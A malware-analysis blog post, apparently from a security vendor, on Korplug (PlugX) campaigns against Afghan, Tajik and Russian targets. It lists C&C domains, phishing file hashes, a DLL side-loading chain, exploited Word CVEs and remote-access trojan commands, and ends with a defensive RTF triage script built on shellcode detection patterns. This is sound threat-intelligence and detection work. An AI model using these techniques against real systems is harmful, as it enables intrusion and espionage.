  12. After taking a look at recent Korplug (PlugX) detections, we identified two larger scale campaigns employing this well-known Remote Access Trojan. This blog gives an overview of the first one, related to Afghanistan & Tajikistan. The other campaign, where the targets were a number of high-profile organizations in Russia, will be the subject of Anton Cherepanov’s presentation at the ZeroNights security conference in Moscow this week.

Sometimes malware used in various attacks is unique enough to identify related incidents, which makes tracking individual botnets simpler. An example is the BlackEnergy Lite variant (also known as BlackEnergy 3) used by a group of attackers (that was then given the name Quedagh, or Sandworm) against targets in Ukraine and other countries. BlackEnergy Lite is clearly distinguishable from the numerous binaries of the more common BlackEnergy 2 also circulating in-the-wild.

In other cases, attackers use more common tools for accomplishing their criminal goals. For example, the Korplug RAT (a.k.a. PlugX) is a well-known toolkit associated with Chinese APT groups and used in a large number of targeted attacks since 2012. For the past several weeks we have taken a closer look at a great number of detections of this malware in many unrelated incidents. Among these, we were able to discover several successful infections where the employed Korplug samples were connecting to the same C&C domain.
DOMAIN: www.notebookhk.net
Updated Date: 2013-11-12 18:03:45
Create Date: 2013-06-18 11:08:17
Registrant Name: lee stan
Registrant Organization: lee stan
Registrant Street: xianggangdiqu
Registrant City: xianggangdiqu
Registrant State: xianggang
Registrant Postal Code: 796373
Registrant Country: HK
Registrant Phone: +0.04375094543
Registrant Fax: +0.04375094543
Registrant Email: stanlee@gmail.com

Other Korplug samples were connecting to a different domain name resolving to the same IPs as notebookhk.net:

DOMAIN: www.dicemention.com
Updated Date: 2013-11-12 18:05:33
Create Date: 2013-09-10 14:35:11
Registrant Name: z x
Registrant Organization: z x
Registrant Street: xianggangdiqu
Registrant City: xianggangdiqu
Registrant State: xianggang
Registrant Postal Code: 123456
Registrant Country: HK
Registrant Phone: +0.0126324313
Registrant Fax: +0.0126324313
Registrant Email: 123@123.com

DOMAIN: www.abudlrasul.com
Updated Date: 2014-10-16 14:16:27
Create Date: 2014-10-16 14:16:27
Registrant Name: gang xin
Registrant Organization: gang xin
Registrant Street: Argentina Argentina
Registrant City: Argentina
Registrant State: Argentina
Registrant Postal Code: 647902
Registrant Country: AR
Registrant Phone: +54.0899567089
Registrant Fax: +54.0899567089
Registrant Email: woffg89@yahoo.com

Taking these C&Cs as a starting point, we were able to locate a number of victims infected through various exploit-laden spear-phishing documents and cunningly-named archives.
A table with a selection of RTF documents and RAR self-extracting archives with a .SCR extension is shown below:

File name | English translation | SHA1
Situation Report about Afghan.doc | | 36119221826D0290BC23371B55A8C0E6A84718DD
AGREEMENT BETWEENTHE NATO AND AFGHANISTAN ON THE STATUS OF NATO FORCES IN AFGHANISTAN.doc | | A6642BC9F3425F0AB93D462002456BE231BB5646
news.doc | | 51CDC273B5638E06906BCB700335E288807744B5
???? ???????????? ?????????? ? ???????? ?????? ???????????? ??????? ?? ???? 2014 ?.scr | Activity plan for military units in the Volga region in July 2014 | EA6EE9EAB546FB9F93B75DCB650AF22A95486391
??????????????????????????????? ??? ?? .scr | Telephone directory of the Ministry of Foreign Affairs of the Kyrgyz Republic | D297DC7D29E42E8D37C951B0B11629051EEBE9C0
? ?????? ?????????? ????????? ??????????????.scr | About the Center for social adaptation of servicemen | 8E5E19EBE719EBF7F8BE4290931FFA173E658CB8
???????? ??????? ??? ???.scr | Meeting minutes of the General Staff of the PRC | 1F726E94B90034E7ABD148FE31EBA08774D1506F
???????????? ?????? ????? ???????????.scr | Corrected action plan template | A9C627AA09B8CC50A83FF2728A3978492AEB79D8
Situation Report about Afghan.scr | | A9C627AA09B8CC50A83FF2728A3978492AEB79D8
??????-???????????? ?????????? ? ??? ??04.10.2014.scr | Military and political situation in Islamic Republic of Afghanistan (IRA) on 04.10.2014 | E32081C56F39EA14DFD1E449C28219D264D80B2F
Afghan Air Force.scr | | E32081C56F39EA14DFD1E449C28219D264D80B2F
???? ???????????.scr | Action plan | 1F726E94B90034E7ABD148FE31EBA08774D1506F

Some of the above-mentioned files also contained decoy documents:

In all of the cases, three binary files were dropped (apart from decoy documents) that led to the Korplug trojan being loaded into memory:
- exe – a legitimate executable with a Kaspersky digital signature that would load a DLL with a specific file name
- dll – a small DLL loader that would pass execution to the Korplug raw binary code
- dll.avp – raw Korplug binary

The Korplug RAT is known to use this side-loading trick by abusing legitimate digitally signed executables, and it is a way to stay under the radar, since a trusted application with a valid signature among startup items is less likely to raise suspicion.

The maliciously crafted documents are RTF files that successfully exploit the CVE-2012-0158 vulnerability in Microsoft Word. The image below shows the beginning of the CVE-2012-0158 shellcode in ASCII encoding within the document (the opcodes 60, 55, 8bec disassemble to pusha; push ebp; mov ebp, esp).

Interestingly, though, the documents also contain the newer CVE-2014-1761 exploit that was extensively used in targeted attacks carried out by a number of other malware families this year (including BlackEnergy, Sednit, MiniDuke, and others). However, this exploit is not implemented correctly due to a wrong file offset in the 1st stage shellcode. Below we see the disassembly of the 1st stage shellcode where it checks the presence of the tag “p!11” marking the beginning of the 2nd stage shellcode and loads it into memory. Even though the tag and 2nd stage shellcode are present in the RTF, they are at a different offset, and thus never get loaded. Sophos’ Gabor Szappanos gives a possible explanation of how these malformed samples may have come into existence.

ESET LiveGrid telemetry indicates that the attacks against these targets have been going on since at least June 2014 and continue through today.
We were able to pinpoint the targets to residents of the following countries:
- Afghanistan
- Tajikistan
- Russia
- Kyrgyzstan
- Kazakhstan

From the topics of the files used to spread the malware, as well as from the affected targets, it appears that the attackers are interested in gathering intelligence related to Afghan, Tajik and Russian military and diplomatic subjects.

Interestingly, most of the affected victims have another thing in common – a number of other RATs, file stealing trojans or keyloggers were detected on their systems on top of the Korplug RAT detection. One of these ‘alternative RATs’ was connecting to a domain also used by the Korplug samples. Since the functionality of these tools was partly overlapping with that of Korplug, it left us wondering whether the attackers were just experimenting with different RATs or were supplementing some functionality that they were unable to accomplish.

Additional information about two malware families that were most often found accompanying Korplug infections is given below.

Alternative Malware #1: DarkStRat

A curious Remote Access Trojan, as research points to a Chinese connection but the commands it listens to are in Spanish (translation in English):
- CERRAR (close)
- DESINSTALAR (uninstall)
- SERVIDOR (server)
- INFO
- MAININFO
- PING
- REBOOT
- POWEROFF
- PROC
- KILLPROC
- VERUNIDADES (see units)
- LISTARARCHIVOS (list files)
- EXEC
- DELFILE
- DELFOLDER
- RENAME
- MKDIR
- CAMBIOID (change ID)
- GETFILE/SENDFILE/RESUMETRANSFER
- SHELL
- SERVICIOSLISTAR (list services)
- INICIARSERVICIO (start service)
- DETENERSERVICIO (stop service)
- BORRARSERVICIO (erase service)
- INSTALARSERVICIO (install service)

The malware can manage processes and services on the infected machine, transfer files to and from the C&C server, run shell commands, and so on. It is written in Delphi and connects to www.dicemention.com. Some samples contain a digital signature by “Nanning weiwu Technology co.,ltd”.
Alternative Malware #2: File Stealer

This malware is written in C and contains several functions for harvesting files off the victim’s hard drive according to criteria set in the configuration file. Apart from doing a recursive sweep of all logical fixed and remote drives, it also continually monitors any attached removable media or network shares by listening to DBT_DEVICEARRIVAL events.

In addition to collecting files, the malware attempts to gather saved passwords, history of visited URLs, account information and proxy information from the following applications:
- Microsoft Messenger
- Microsoft Outlook
- Microsoft Internet Explorer
- Mozilla Firefox

The C&C domains used by this malware are:
- newvinta.com
- worksware.net

Some samples of this file stealer detected in these campaigns also contain the signature by “Nanning weiwu Technology co.,ltd” – another indicator that the infections are related.

List of SHA1 hashes:
Research by: Anton Cherepanov
Via Korplug military targeted attacks: Afghanistan & Tajikistan
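A static triage script, added here as an example and not ESET's code, that flags the RTF indicators the post describes: an embedded object, the CVE-2012-0158 shellcode prologue that appears as ASCII hex (60 55 8b ec), and the "p!11" second-stage tag. Where it searches (raw text plus decoded \objdata hex runs) is my choice, and the sample document is constructed and harmless.

```python
r"""Static triage of RTF files for the indicators described in the post.

Added example, not ESET's code. It flags three things the post mentions: an
embedded object (\objdata / \objupdate), the CVE-2012-0158 shellcode prologue
that appears as ASCII hex (60 55 8b ec = pusha; push ebp; mov ebp, esp), and
the "p!11" tag the CVE-2014-1761 first stage looks for. Searching both the raw
text and decoded \objdata hex runs is my choice; the sample RTF is constructed
and contains no exploit.
"""
import re

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
PROLOGUE_HEX_RE = re.compile(rb"60\s*55\s*8b\s*ec", re.IGNORECASE)
PROLOGUE_BIN = b"\x60\x55\x8b\xec"
STAGE2_TAG = b"p!11"


def objdata_blobs(rtf: bytes):
    """Decode every hex run that follows an objdata control word."""
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        hexstr = hexstr[: len(hexstr) - len(hexstr) % 2]  # drop a dangling nibble
        if hexstr:
            yield bytes.fromhex(hexstr.decode("ascii"))


def triage_rtf(rtf: bytes) -> dict:
    """Return {'rtf': bool, 'hits': [...], 'suspicious': bool} for one file."""
    hits = []
    if not rtf.lstrip().startswith(b"{\\rtf"):
        return {"rtf": False, "hits": hits, "suspicious": False}
    if b"\\objdata" in rtf or b"\\objupdate" in rtf:
        hits.append("embedded-object")
    blobs = list(objdata_blobs(rtf))
    if PROLOGUE_HEX_RE.search(rtf) or any(PROLOGUE_BIN in b for b in blobs):
        hits.append("shellcode-prologue")
    if STAGE2_TAG in rtf or any(STAGE2_TAG in b for b in blobs):
        hits.append("stage2-tag")
    # Four prologue bytes alone are weak evidence, so require an embedded
    # object plus at least one other indicator before calling it suspicious.
    suspicious = "embedded-object" in hits and len(hits) > 1
    return {"rtf": True, "hits": hits, "suspicious": suspicious}


# Constructed sample: harmless RTF whose object hex merely contains the
# prologue bytes and the tag (70 21 31 31 = "p!11"). Not an exploit document.
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\\deff0 {\\fonttbl{\\f0 Arial;}}\n"
    b"{\\object\\objemb\\objdata deadbeef 60558BEC 90909090 70213131 41424344 }\n"
    b"\\par Situation Report about Afghan\\par }"
)
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0 Hello\\par }"

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_RTF), ("benign", BENIGN_RTF)):
        print(name, triage_rtf(doc))
```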